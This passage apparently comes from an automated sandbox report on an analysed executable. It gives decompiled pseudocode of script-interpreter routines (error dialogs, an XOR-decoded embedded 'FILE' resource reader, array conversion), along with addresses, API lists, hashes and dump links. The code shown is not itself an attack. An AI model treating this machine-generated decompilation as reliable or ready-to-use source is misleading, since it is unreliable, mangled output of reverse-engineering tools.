									_t11 = E00AA1487(_t11, L"False");
								} else {
									_t10 =  &_v152; // -148
									__edx = _t10;
									__eax = E00AA1487(_t10, L"True");
								}
								goto L18;
							case 6:
								__edx =  *__ebx;
								_t12 =  &_v20; // -16
								__ecx = _t12;
								E00ADB36D( *__ebx, _t12) =  *__eax;
								_t13 =  &_v152; // -148
								__ecx = _t13;
								__eax = E00AA1487(_t13, __eax);
								_t14 =  &_v20; // -16
								__ecx = _t14;
								__eax = E00A92480(_t14);
								L18:
								E00A93FB0(_t38);
								_push(0x10);
								_t33 = E00AA14F7(_t41, _t38, _t53);
								_t54 = _t33;
								if(_t33 == 0) {
									__eflags = 0;
									 *((intOrPtr*)(_t38 + 0xc)) = 0;
									return 0;
								}
								_t35 = E00A91D10( &_v152, _t33, _t54);
								 *((intOrPtr*)(_t38 + 0xc)) = _t35;
								return _t35;
								goto L22;
							case 7:
								__edx =  *__ebx;
								__esi =  *( *__ebx);
								__ecx = 0;
								__eax = 6 + __esi * 4;
								2 = __eax * 2 >> 0x20;
								__eax = __eax * 2;
								0 | __eflags > 0x00000000 =  ~(__eflags > 0);
								__ecx =  ~(__eflags > 0) | __eax;
								_push( ~(__eflags > 0) | __eax);
								__edi = E00AA14F7(__edi, __esi, __eflags);
								__eax =  *__ebx;
								__esp = __esp + 4;
								__eflags =  *__eax;
								if( *__eax == 0) {
									__eax = 0;
									__eflags = 0;
									 *__edi = __ax;
								} else {
									__ecx =  *__eax;
									__edx =  *(__eax + 4);
									__eax = E00AC2DDE( *(__eax + 4), __edi,  *__eax);
								}
								__esi = __ebx;
								__eax = E00A93FB0(__esi);
								_push(0x10);
								__eax = E00AA14F7(__edi, __esi, __eflags);
								__esp = __esp + 4;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__eflags = 0;
									_push(__edi);
									 *(__ebx + 0xc) = 0;
									__eax = E00AA10FC();
									__esp = __esp + 4;
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__esi = __eax;
									__eax = E00A91D10(__edi, __eax, __eflags);
									_push(__edi);
									 *(__ebx + 0xc) = __eax;
									__eax = E00AA10FC();
									__esp = __esp + 4;
									_pop(__edi);
									_pop(__esi);
									return __eax;
								}
								goto L22;
						}
					}
				}
				L22:
			}








                            0x00ae3130
                            0x00ae3133
                            0x00ae3139
                            0x00ae32f5
                            0x00ae313f
                            0x00ae313f
                            0x00ae3145
                            0x00ae32b3
                            0x00ae32b5
                            0x00000000
                            0x00ae314b
                            0x00ae314b
                            0x00000000
                            0x00ae315e
                            0x00ae3163
                            0x00000000
                            0x00000000
                            0x00ae316b
                            0x00ae316e
                            0x00ae3172
                            0x00ae3172
                            0x00ae317b
                            0x00000000
                            0x00000000
                            0x00ae318a
                            0x00ae318d
                            0x00ae3190
                            0x00ae3190
                            0x00ae3196
                            0x00ae319b
                            0x00ae319c
                            0x00ae31a1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ae31a9
                            0x00ae31ac
                            0x00ae31ac
                            0x00ae31b8
                            0x00000000
                            0x00000000
                            0x00ae31c5
                            0x00ae31c8
                            0x00ae31e3
                            0x00ae31ef
                            0x00ae31ca
                            0x00ae31ca
                            0x00ae31ca
                            0x00ae31d6
                            0x00ae31db
                            0x00000000
                            0x00000000
                            0x00ae31fc
                            0x00ae31fe
                            0x00ae31fe
                            0x00ae3208
                            0x00ae320b
                            0x00ae320b
                            0x00ae3212
                            0x00ae321a
                            0x00ae321a
                            0x00ae321d
                            0x00ae32bc
                            0x00ae32be
                            0x00ae32c3
                            0x00ae32c5
                            0x00ae32cd
                            0x00ae32cf
                            0x00ae32ea
                            0x00ae32ed
                            0x00000000
                            0x00ae32f0
                            0x00ae32d9
                            0x00ae32e0
                            0x00ae32e7
                            0x00000000
                            0x00000000
                            0x00ae3227
                            0x00ae3229
                            0x00ae322b
                            0x00ae322d
                            0x00ae3239
                            0x00ae3239
                            0x00ae323e
                            0x00ae3240
                            0x00ae3242
                            0x00ae3248
                            0x00ae324a
                            0x00ae324c
                            0x00ae324f
                            0x00ae3252
                            0x00ae3266
                            0x00ae3266
                            0x00ae3268
                            0x00ae3254
                            0x00ae3254
                            0x00ae3256
                            0x00ae325c
                            0x00ae3261
                            0x00ae326b
                            0x00ae326d
                            0x00ae3272
                            0x00ae3274
                            0x00ae3279
                            0x00ae327c
                            0x00ae327e
                            0x00ae329c
                            0x00ae329c
                            0x00ae329e
                            0x00ae329f
                            0x00ae32a2
                            0x00ae32a7
                            0x00ae32aa
                            0x00ae32ab
                            0x00ae32b0
                            0x00ae3280
                            0x00ae3280
                            0x00ae3282
                            0x00ae3287
                            0x00ae3288
                            0x00ae328b
                            0x00ae3290
                            0x00ae3293
                            0x00ae3294
                            0x00ae3299
                            0x00ae3299
                            0x00000000
                            0x00000000
                            0x00ae314b
                            0x00ae3145
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __swprintf_wcscpy$__i64tow__itow
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 3038501623-2263619337
                            • Opcode ID: f3dc0b0e4df0b67e9e86aad51e0ab1db6a47d982bb697dac1c7fba89a12fbeb1
                            • Instruction ID: 74634db738295ff8b03d3a183e4714db1d712c4c8e112a8ff20f66efbbb77ecb
                            • Opcode Fuzzy Hash: f3dc0b0e4df0b67e9e86aad51e0ab1db6a47d982bb697dac1c7fba89a12fbeb1
                            • Instruction Fuzzy Hash: BC410EB39002145BDF10EB75DD86FA67378EF5A300F0445A5FA49DB241E731DA58C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEE525, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00AEE525(void* __fp0, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v64;
				WCHAR* _v80;
				short _v8276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t48;
				WCHAR* _t57;
				intOrPtr _t92;
				WCHAR* _t110;
				intOrPtr _t111;
				intOrPtr _t120;
				intOrPtr _t122;
				struct HINSTANCE__* _t123;
				void* _t136;

				_t136 = __fp0;
				_t48 = E00AB2160(0x2054);
				if( *0xb274e2 == 0) {
					_t48 = _a4;
					_t129 =  *((intOrPtr*)(_t48 + 0xf8)) - 1;
					if( *((intOrPtr*)(_t48 + 0xf8)) != 1) {
						LoadStringW( *0xb27520, 0x66,  &_v8276, 0xfff);
						_t110 =  &_v8276;
						E00A91D10(_t110,  &_v80, _t129);
						_t95 =  *0xb27520;
						LoadStringW( *0xb27520, 0x72, _t110, 0xfff);
						E00A91D10(_t110,  &_v64, _t129);
						_t105 = _a4;
						_t120 =  *((intOrPtr*)(_a4 + 0xf4));
						_v8 = E00AC48C5(_t120);
						_t111 = E00AC4891(_t120);
						_v28 = _t111;
						_t92 = E00AC48EF(E00AC4916(_t120));
						_v32 = _t92;
						_t57 =  &_v8276;
						_t130 = _t92;
						if(_t92 == 0) {
							_t95 = _a4;
							_t105 =  *((intOrPtr*)(_t95 + 0xc8));
							_push( *((intOrPtr*)(_t95 + 0xc8)));
							_push(_t120);
						} else {
							_push(_t92);
							_push(_t111);
						}
						_push(L"Line %d  (File \"%s\"):\n\n");
						_push(_t57);
						E00AA31BB(_t105);
						E00A91D10( &_v8276,  &_v24, _t130);
						_t122 = _v8;
						_t131 = _t122;
						if(_t122 != 0) {
							E00A91DE0( &_v24, _t95, _t122, _t136);
							E00A91DE0( &_v24, _t95, "\n", _t136);
						}
						_t96 =  &_v48;
						E00A9BEC0( &_v48, _t131);
						_t113 = _a8;
						if(_a8 != 0) {
							E00A92390( &_v48, L"^ ERROR ", _t105, _t113);
							E00A91DE0( &_v48,  &_v48, _t113, _t136);
							_t96 =  &_v48;
							E00A9BFA0( &_v24, _t136,  &_v48);
							E00A91DE0( &_v24,  &_v48, "\n", _t136);
							_t92 = _v32;
						}
						E00A91DE0( &_v24, _t96, L"\nError: ", _t136);
						E00A9BFA0( &_v24, _t136,  &_v64);
						if( *0xb274e8 == 0) {
							MessageBoxW( *0xb27518, _v24, _v80, 0x11010);
							goto L14;
						} else {
							_t134 = _t92;
							if(_t92 == 0) {
								_t123 = _a4;
								_push(_v64);
								_push( *((intOrPtr*)(_t123 + 0xf4)));
								_push( *((intOrPtr*)(_t123 + 0xc8)));
								_push(L"%s (%d) : ==> %s:\n");
								E00AA39DE(_t92,  *((intOrPtr*)(_t123 + 0xc8)), L"\nError: ", _t123, __eflags);
								L15:
								asm("sbb eax, eax");
								 *((intOrPtr*)(_t123 + 0xf8)) = 1;
								 *0xb274f4 = ( ~( *(_t123 + 0x118) & 0x000000ff) & 0x7ffff071) + 1;
								E00A92480( &_v48);
								E00A92480( &_v24);
								E00A92480( &_v64);
								return E00A92480( &_v80);
							}
							_push(_v48);
							_push(_t122);
							_push(_v64);
							_push(_v28);
							_push(_t92);
							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
							E00AA39DE(_t92, _v28, L"\nError: ", _t122, _t134);
							L14:
							_t123 = _a4;
							goto L15;
						}
					}
				}
				return _t48;
			}
























                            0x00aee525
                            0x00aee52d
                            0x00aee53c
                            0x00aee542
                            0x00aee545
                            0x00aee54c
                            0x00aee56d
                            0x00aee56f
                            0x00aee578
                            0x00aee57d
                            0x00aee58c
                            0x00aee591
                            0x00aee596
                            0x00aee599
                            0x00aee5a6
                            0x00aee5ae
                            0x00aee5b1
                            0x00aee5bf
                            0x00aee5c1
                            0x00aee5c4
                            0x00aee5ca
                            0x00aee5cc
                            0x00aee5d2
                            0x00aee5d5
                            0x00aee5db
                            0x00aee5dc
                            0x00aee5ce
                            0x00aee5ce
                            0x00aee5cf
                            0x00aee5cf
                            0x00aee5dd
                            0x00aee5e2
                            0x00aee5e3
                            0x00aee5f4
                            0x00aee5f9
                            0x00aee5fc
                            0x00aee5fe
                            0x00aee605
                            0x00aee612
                            0x00aee612
                            0x00aee617
                            0x00aee61a
                            0x00aee61f
                            0x00aee624
                            0x00aee62e
                            0x00aee636
                            0x00aee63b
                            0x00aee642
                            0x00aee64f
                            0x00aee654
                            0x00aee654
                            0x00aee65f
                            0x00aee66b
                            0x00aee677
                            0x00aee6d2
                            0x00000000
                            0x00aee679
                            0x00aee679
                            0x00aee67b
                            0x00aee69d
                            0x00aee6ac
                            0x00aee6ad
                            0x00aee6ae
                            0x00aee6af
                            0x00aee6b4
                            0x00aee6db
                            0x00aee6e4
                            0x00aee6ef
                            0x00aee6f9
                            0x00aee6fe
                            0x00aee706
                            0x00aee70e
                            0x00000000
                            0x00aee716
                            0x00aee686
                            0x00aee687
                            0x00aee688
                            0x00aee689
                            0x00aee68a
                            0x00aee68b
                            0x00aee690
                            0x00aee6d8
                            0x00aee6d8
                            0x00000000
                            0x00aee6d8
                            0x00aee677
                            0x00aee54c
                            0x00aee721

                            APIs
                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 00AEE56D
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 00AEE58C
                            • __swprintf.LIBCMT ref: 00AEE5E3
                            • _wprintf.LIBCMT ref: 00AEE690
                            • _wprintf.LIBCMT ref: 00AEE6B4
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2295938435-8599901
                            • Opcode ID: 53576b6df2fddad3365ed5aa9d0625f7afdd56b08e775dd725e37da884506e11
                            • Instruction ID: 3d93f6d7cb2c55df5bbf5c0fee96a489a9cc6d542169d01ece99967abb089313
                            • Opcode Fuzzy Hash: 53576b6df2fddad3365ed5aa9d0625f7afdd56b08e775dd725e37da884506e11
                            • Instruction Fuzzy Hash: A0517472E10209ABDB14EFA4DD82EEF77B9EF44340F508069F91567251EB70AE45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE268F, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E00AE268F(void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v548;
				char _v1076;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				void* _t52;
				void* _t54;
				signed int _t59;
				void* _t63;
				void* _t64;
				intOrPtr* _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				void* _t96;
				void* _t97;

				_t99 = __eflags;
				_t89 = _a4;
				_v8 = 0;
				while(1) {
					E00AA4C24( &_v16, 1, 4,  *_t89);
					E00ADAF66( &_v16, _t99,  &_v16, 4, 0x18ee);
					_v12 = 0;
					_t37 = E00AA4C50( &_v16, "FILE");
					_t93 = _t91 + 0x18;
					_t100 = _t37;
					if(_t37 != 0) {
						break;
					}
					_v8 = _v8 + 1;
					E00AA4C24( &_a4, 4, 1,  *_t89);
					_t83 = _a4 ^ 0x0000adbc;
					_t63 = (_a4 ^ 0x0000adbc) + (_a4 ^ 0x0000adbc);
					E00AA4C24( &_v548, 1, _t63,  *_t89);
					E00ADAF66( &_v548, _t100,  &_v548, _t63, _t83 + 0xb33f);
					 *((short*)(_t90 + _t63 - 0x220)) = 0;
					E00AA1487( &_v1076,  &_v548);
					E00AA4C24( &_a4, 4, 1,  *_t89);
					_t86 = _a4 ^ 0x0000f820;
					_t64 = (_a4 ^ 0x0000f820) + (_a4 ^ 0x0000f820);
					E00AA4C24( &_v548, 1, _t64,  *_t89);
					E00ADAF66( &_v548, _t100,  &_v548, _t64, _t86 + 0xf479);
					 *((short*)(_t90 + _t64 - 0x220)) = 0;
					E00AA1487(_a12,  &_v548);
					_t88 = _a8;
					_t79 =  &_v1076;
					_t52 = E00AA305C( &_v1076, _a8);
					_t96 = _t93 + 0x58;
					if(_t52 == 0) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						_t54 = E00AA305C(_t88, "*");
						_t97 = _t96 + 8;
						if(_t54 != 0) {
							L5:
							_push(1);
							_push(1);
							_push( *_t89);
							E00AA4FF1(_t64, _t79, _t88, _t89, _t99);
							E00AA4C24( &_v20, 4, 1,  *_t89);
							_t59 = _v20 ^ 0x000087bc;
							_v20 = _t59;
							_push(1);
							_push(_t59 + 0x18);
							_push( *_t89);
							E00AA4FF1(_t64,  &_v20, _t88, _t89, _t99);
							_t91 = _t97 + 0x28;
							continue;
						} else {
							_t99 = _v8 - _t54;
							if(_v8 == _t54) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
					L8:
				}
				return 6;
				goto L8;
			}

























                            0x00ae268f
                            0x00ae269a
                            0x00ae269e
                            0x00ae26a5
                            0x00ae26b4
                            0x00ae26c7
                            0x00ae26d5
                            0x00ae26d9
                            0x00ae26de
                            0x00ae26e1
                            0x00ae26e3
                            0x00000000
                            0x00000000
                            0x00ae26eb
                            0x00ae26f6
                            0x00ae2701
                            0x00ae2707
                            0x00ae2714
                            0x00ae272b
                            0x00ae2740
                            0x00ae2748
                            0x00ae2758
                            0x00ae2763
                            0x00ae2769
                            0x00ae2776
                            0x00ae278d
                            0x00ae279f
                            0x00ae27a7
                            0x00ae27ac
                            0x00ae27af
                            0x00ae27b7
                            0x00ae27bc
                            0x00ae27c1
                            0x00ae281a
                            0x00ae281a
                            0x00ae2822
                            0x00ae27c3
                            0x00ae27c9
                            0x00ae27ce
                            0x00ae27d3
                            0x00ae27da
                            0x00ae27dc
                            0x00ae27de
                            0x00ae27e0
                            0x00ae27e1
                            0x00ae27f4
                            0x00ae27fc
                            0x00ae2801
                            0x00ae2807
                            0x00ae2809
                            0x00ae280c
                            0x00ae280d
                            0x00ae2812
                            0x00000000
                            0x00ae27d5
                            0x00ae27d5
                            0x00ae27d8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ae27d8
                            0x00ae27d3
                            0x00000000
                            0x00ae27c1
                            0x00ae2830
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fread_nolock$_fseek_wcscpy
                            • String ID: FILE
                            • API String ID: 3888824918-3121273764
                            • Opcode ID: c4b11dca6464aedc0dcdcaeb05c915cf16eab609b7b7881eaa7dfdbb5bc3ea03
                            • Instruction ID: 06c5b408991679ad7049fa10282b3a119edf33ef00b44fee44cf7a5a07fd8aca
                            • Opcode Fuzzy Hash: c4b11dca6464aedc0dcdcaeb05c915cf16eab609b7b7881eaa7dfdbb5bc3ea03
                            • Instruction Fuzzy Hash: 684197B2910204BBDB20EFA4DC81FEB73BDEF99710F148559B90897181E7B59A44CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE3F89, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E00AE3F89(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _v24;
				WCHAR* _v40;
				short _v8232;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t49;
				void* _t56;
				void* _t73;
				void* _t75;

				_t75 = __fp0;
				_t73 = __eflags;
				E00AB2160(0x2028);
				_t49 = _a4;
				_t50 =  *(_t49 + 0x48);
				LoadStringW(GetModuleHandleW(0),  *(_t49 + 0x48),  &_v8232, 0xfff);
				_t67 =  &_v40;
				E00A91D10( &_v8232,  &_v40, _t73);
				_t74 =  *((char*)(_t49 + 3));
				if( *((char*)(_t49 + 3)) == 0) {
					_t29 = _a8;
					__eflags = _t29;
					if(_t29 != 0) {
						_push(_t29);
						E00AA31BB(_a12,  &_v8232, L"Line %d  (File \"%s\"):\n\n", _a12);
					} else {
						_t50 =  &_v8232;
						E00AA31BB(_t56,  &_v8232, L"Line %d:\n\n", _a12);
					}
					_t68 =  &_v24;
					E00A91D10( &_v8232,  &_v24, __eflags);
					E00A91DE0( &_v24, _t50, _a20, _t75);
					E00A91DE0(_t68, _t50, L"\n\nError: ", _t75);
					E00A91DE0(_t68, _t50, _a16, _t75);
					E00A91DE0(_t68, _t50, L".\n\n", _t75);
					MessageBoxW(0, _v24, _v40, 0x11010);
					E00A92480(_t68);
					return E00A92480( &_v40);
				} else {
					_push(0xb14e64);
					_push(_a20);
					_push(_a16);
					_push(_a12);
					_push(_a8);
					_push(L"%s (%d) : ==> %s.: \n%s \n%s\n");
					E00AA39DE(_t49, _a8,  &_v8232,  &_v40, _t74);
					return E00A92480(_t67);
				}
			}















                            0x00ae3f89
                            0x00ae3f89
                            0x00ae3f91
                            0x00ae3f97
                            0x00ae3f9a
                            0x00ae3fb5
                            0x00ae3fc1
                            0x00ae3fc4
                            0x00ae3fc9
                            0x00ae3fcd
                            0x00ae4001
                            0x00ae4004
                            0x00ae4006
                            0x00ae4025
                            0x00ae4033
                            0x00ae4008
                            0x00ae400c
                            0x00ae4018
                            0x00ae401d
                            0x00ae4041
                            0x00ae4044
                            0x00ae404e
                            0x00ae405a
                            0x00ae4064
                            0x00ae4070
                            0x00ae4084
                            0x00ae408c
                            0x00ae409f
                            0x00ae3fcf
                            0x00ae3fd8
                            0x00ae3fdd
                            0x00ae3fe1
                            0x00ae3fe2
                            0x00ae3fe3
                            0x00ae3fe4
                            0x00ae3fe9
                            0x00ae3ffe
                            0x00ae3ffe

                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,00AB818B,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00AE3FAE
                            • LoadStringW.USER32(00000000), ref: 00AE3FB5
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • _wprintf.LIBCMT ref: 00AE3FE9
                            • __swprintf.LIBCMT ref: 00AE4018
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE4084
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 455036304-4153970271
                            • Opcode ID: 3d163fe94c5d145a018f99d133207b1cb3808b240184820699adcbb7c357ff97
                            • Instruction ID: 50ab315162007c0ae473ea391eeeb87ea31c80c3ec77d83b2f8b3d0033f95c00
                            • Opcode Fuzzy Hash: 3d163fe94c5d145a018f99d133207b1cb3808b240184820699adcbb7c357ff97
                            • Instruction Fuzzy Hash: 48319C72B00209ABCF15EF94CD46DEF73B8EB88751F904055FA04AB242DA31AE55CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF6DDB, Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                            Download Yara Rule
                            C-Code - Quality: 29%
                            			E00AF6DDB(intOrPtr* _a4, signed short* _a8) {
				char _v8;
				signed short* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v36;
				signed short _v44;
				void* __edi;
				void* __esi;
				signed int _t100;
				intOrPtr _t105;
				signed int _t109;
				signed int _t110;
				signed int _t113;
				void* _t120;
				signed int _t135;
				signed int _t139;
				signed int _t146;
				signed short* _t154;
				void* _t155;
				signed int _t157;
				signed short _t161;
				signed int _t183;
				void* _t199;
				signed short* _t202;
				signed int _t204;
				signed int _t208;
				signed int _t210;
				intOrPtr* _t212;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t227;

				_t154 = _a8;
				_t100 =  *_t154 & 0x0000ffff;
				_t219 = _t218 - 0x2c;
				_t212 = _a4;
				if((_t100 & 0x00002000) == 0) {
					L13:
					return 0;
				} else {
					if((_t100 & 0x00004000) == 0) {
						_t154 = _t154[4];
						_v12 = _t154;
						_t202 = _t154;
					} else {
						_t202 =  *(_t154[4]);
						_v12 = _t202;
					}
					if(_t202 == 0) {
						goto L13;
					} else {
						E00A9EB70(_t212, _t154);
						 *((intOrPtr*)( *_t212 + 0x210)) =  *_t202;
						_t105 =  *_t212;
						_t155 = 0;
						if( *((intOrPtr*)(_t105 + 0x210)) > 0) {
							_t13 =  &(_t202[8]); // 0xb09a1a
							_t199 = 0x10c;
							_a8 = _t13;
							do {
								_a8 =  &(_a8[4]);
								 *(_t199 + _t105) =  *_a8;
								_t105 =  *_t212;
								_t155 = _t155 + 1;
								_t199 = _t199 + 4;
							} while (_t155 <  *((intOrPtr*)(_t105 + 0x210)));
						}
						E00A9EA50(_t212, _t155, 0);
						_t146 =  *( *_t212 + 8);
						_t157 = _t202[1] & 0x0000ffff;
						_t109 = _t157 & 0x00000f00;
						_t220 = _t219 + 4;
						_t227 = _t109 - 0x400;
						if(_t227 > 0) {
							__eflags = _t109 - 0x800;
							if(_t109 == 0x800) {
								_t110 =  &_v24;
								__imp__#23(_t202, _t110);
								__eflags = _t110;
								if(_t110 >= 0) {
									_t204 = 0;
									__eflags = _t146;
									if(__eflags > 0) {
										_a4 = 0;
										do {
											_push(0x10);
											_t113 = E00AA14F7(_t204, _t212, __eflags);
											_t220 = _t220 + 4;
											__eflags = _t113;
											if(_t113 == 0) {
												_t113 = 0;
												__eflags = 0;
											} else {
												 *_t113 = 0;
												 *((intOrPtr*)(_t113 + 8)) = 1;
												 *((intOrPtr*)(_t113 + 0xc)) = 0;
											}
											 *( *((intOrPtr*)( *_t212)) + _t204 * 4) = _t113;
											_v44 = 0x400c;
											_v36 = _a4 + _v24;
											E00AF71BD( *( *((intOrPtr*)( *_t212)) + _t204 * 4),  &_v44);
											_a4 = _a4 + 0x10;
											_t204 = _t204 + 1;
											__eflags = _t204 - _t146;
										} while (__eflags < 0);
									}
									goto L57;
								}
								goto L58;
							} else {
								goto L30;
							}
						} else {
							if(_t227 == 0) {
								__imp__#23(_t202,  &_v20);
								__eflags = _t109;
								if(_t109 < 0) {
									goto L58;
								} else {
									_t208 = 0;
									__eflags = _t146;
									if(__eflags > 0) {
										do {
											_push(0x10);
											_t135 = E00AA14F7(_t208, _t212, __eflags);
											_t220 = _t220 + 4;
											__eflags = _t135;
											if(_t135 == 0) {
												_t135 = 0;
												__eflags = 0;
											} else {
												 *_t135 = 0;
												 *((intOrPtr*)(_t135 + 8)) = 1;
												 *((intOrPtr*)(_t135 + 0xc)) = 0;
											}
											 *( *((intOrPtr*)( *_t212)) + _t208 * 4) = _t135;
											_v44 = 9;
											_v36 = _v20 + _t208 * 4;
											E00AF71BD( *( *((intOrPtr*)( *_t212)) + _t208 * 4),  &_v44);
											_t208 = _t208 + 1;
											__eflags = _t208 - _t146;
										} while (__eflags < 0);
									}
									__imp__#24(_v12);
									return 1;
								}
							} else {
								if(_t109 == 0x100) {
									__imp__#23(_t202,  &_v16);
									__eflags = _t109;
									if(_t109 >= 0) {
										_t210 = 0;
										__eflags = _t146;
										if(__eflags > 0) {
											do {
												_push(0x10);
												_t139 = E00AA14F7(_t210, _t212, __eflags);
												_t220 = _t220 + 4;
												__eflags = _t139;
												if(_t139 == 0) {
													_t139 = 0;
													__eflags = 0;
												} else {
													 *_t139 = 0;
													 *((intOrPtr*)(_t139 + 8)) = 1;
													 *((intOrPtr*)(_t139 + 0xc)) = 0;
												}
												 *( *((intOrPtr*)( *_t212)) + _t210 * 4) = _t139;
												_v44 = 8;
												_v36 =  *((intOrPtr*)(_v16 + _t210 * 4));
												E00AF71BD( *( *((intOrPtr*)( *_t212)) + _t210 * 4),  &_v44);
												_t210 = _t210 + 1;
												__eflags = _t210 - _t146;
											} while (__eflags < 0);
										}
										L57:
										__imp__#24(_v12);
									}
									goto L58;
								} else {
									if(_t109 != 0x200) {
										L30:
										__eflags = _t157;
										if(_t157 >= 0) {
											goto L12;
										} else {
											__imp__#77(_t202,  &_a8);
											_t161 = _a8;
											_t120 = (_t161 & 0x0000ffff) + 0xfffffffe;
											__eflags = _t120 - 0x15;
											if(_t120 > 0x15) {
												L42:
												_t183 = _t161 & 0x0000ffff;
												__eflags = _t183 & 0x00004000;
												if((_t183 & 0x00004000) == 0) {
													goto L12;
												} else {
													goto L43;
												}
											} else {
												_t51 = _t120 + 0xaf71a7; // 0x6608558b
												switch( *((intOrPtr*)(( *_t51 & 0x000000ff) * 4 +  &M00AF718F))) {
													case 0:
														_a4 = 2;
														goto L36;
													case 1:
														L43:
														_a4 = 4;
														goto L36;
													case 2:
														_a4 = 8;
														goto L36;
													case 3:
														_a4 = 1;
														L36:
